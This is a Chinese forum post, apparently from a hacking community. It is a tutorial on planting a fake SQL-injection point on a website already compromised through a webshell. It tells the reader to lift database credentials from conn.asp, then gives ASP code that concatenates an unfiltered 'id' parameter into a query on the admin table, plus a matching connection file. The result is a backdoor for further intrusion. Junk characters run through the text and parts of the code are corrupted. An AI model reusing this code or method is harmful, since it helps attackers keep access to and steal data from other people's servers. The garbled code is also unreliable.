自己构造注入点方便入侵
& a' y: a- x5 J. B. P$ y3 j0 p& D4 ~+ S* q; G2 r2 ^
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息9 s% ~; _ @8 W, V1 `4 J
3 V" R2 p, Y& g3 u& ?
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!: b% b R9 n9 G$ a( ^6 d
* P1 f A0 }6 ]1 \
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和' c! l, t: K; ]" r
6 m: H) G( h$ T! W1 Y% ?" u
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
' [8 x; ]' i! u8 g9 q1 Y) U% ?( m0 ~ w, u$ {/ w) M* K
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:* Q: P$ @* J$ J7 j0 w
3 _4 Z! d5 c9 ]程序代码8 V% I8 o [ f6 p6 F" p. O
<!--#include file="xx.asp"-->
. }$ {: t- ?4 L& Y' R7 J7 X9 O6 B" Y<%4 M( ~4 Y2 ]$ o
set rs=server.createobject("ADODB.recordset")- d' k8 q' T4 I8 B8 {) y
id = request("id")* N4 t! L# c! H! Q
strSQL = "select * from admin where id=" & id
1 L C/ a6 j9 ?1 R) I- hrs.open strSQL,conn,1,3
+ j! w2 k8 w: X) A" Rrs.close$ S; Z/ V1 z4 p; Z$ f& B8 B
%>5 G9 }! d* P& \9 x' L+ o' i! I
. o8 Z. A% K* W' G把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
" @1 Q1 A2 d0 o2 i% O" [$ V- ?8 c$ B4 O L. j5 z, f
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
# E2 \2 J! _! v9 w1 c2 S
2 v" l# @7 q! l8 g! ?; [9 Q然后就要构造一个连接数据库的文件了,代码如下:
0 s6 h6 R, J. E1 v6 G程序代码8 ?$ N7 J8 A7 Z7 p* I
<% 8 U+ ~' z% u! Z4 L; K; B; \
strSQLServerName = "000.000.000.000" '服务器名称或地址7 ?" c. m* [- R+ c
strSQLDBUserName = "sqlname" '数据库帐号6 n# r# k4 C* q4 S4 {/ R0 p
strSQLDBPassword = "sqlpass" '数据库密码3 E# o& @$ h5 z5 y* @. j& @0 ]
strSQLDBName = "sqldataname" '数据库名称
( M4 p. R A, ^; x% [Set conn = Server.CreateObject("ADODB.Connection"): \# V3 T) {3 R- y6 C) y
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
7 }: w$ T, A9 h" mconn.open strCon
, j4 i) u" [3 D7 F% n%>9 i" K( Y# s7 x
/ ^8 \5 z- Y3 v, h0 m3 I这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
: d$ \& V$ K# z9 ?- |- V8 |
1 o3 e$ a( R0 n/ R" d* d就这样,正常情况下,就OK了,伪造成功……
; {1 o% Q2 R5 J
7 _$ D- j9 K) E8 u" I 如果有什么问题可以提出来大家一起探讨解决。 |